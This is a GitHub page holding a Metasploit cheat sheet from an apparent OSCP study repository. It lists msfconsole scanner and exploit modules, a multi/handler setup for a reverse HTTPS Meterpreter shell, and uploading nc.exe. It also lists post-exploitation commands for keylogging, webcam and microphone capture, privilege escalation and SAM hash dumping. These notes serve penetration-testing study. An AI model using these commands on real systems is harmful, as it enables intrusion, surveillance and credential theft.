forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
The Metasploit Framework
119 lines (89 loc) · 3.31 KB
/
The Metasploit Framework
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
Metasploit
MetaSploit requires Postfresql
# systemctl start postgresql
To enable Postgresql on startup
# systemctl enable postgresql
MSF Syntax
Start metasploit
# msfconsole
# msfconsole -q
Show help for command
# show -h
Show Auxiliary modules
# show auxiliary
Use a module
# use auxiliary/scanner/snmp/snmp_enum
# use auxiliary/scanner/http/webdav_scanner
# use auxiliary/scanner/smb/smb_version
# use auxiliary/scanner/ftp/ftp_login
# use exploit/windows/pop3/seattlelab_pass
Show the basic information for a module
# info
Show the configuration parameters for a module
# show options
Set options for a module
# set RHOSTS $ip-254
# set THREADS 10
Run the module
# run
Execute an Exploit
# exploit
Search for a module
# search type:auxiliary login
Metasploit Database Access
Show all hosts discovered in the MSF database
# hosts
Scan for hosts and store them in the MSF database
# db_nmap
Search machines for specific ports in MSF database
# services -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)
# services -p 443 --rhosts
Staged and Non-staged
Non-staged payload - is a payload that is sent in its entirety in one go
Staged - sent in two parts
Not have enough buffer space
Or need to bypass antivirus
Experimenting with Meterpreter
Get system information from Meterpreter Shell
# sysinfo
Get user id from Meterpreter Shell
# getuid
Search for a file
# search -f *pass*.txt
Upload a file
# upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a file
# download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shell
# shell
Exit the meterpreter shell
# exit
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter payload
# use exploit/multi/handler
# set PAYLOAD windows/meterpreter/reverse_https
# set LHOST $ip
# set LPORT 443
# exploit
# [*] Started HTTPS reverse handler on https://$ip:443/
Building Your Own MSF Module
# mkdir -p ~/.msf4/modules/exploits/linux/misc
# cd ~/.msf4/modules/exploits/linux/misc
# cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
# nano crossfire.rb
Post Exploitation with Metasploit
download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database
Meterpreter Post Exploitation Features
Create a Meterpreter background session
#background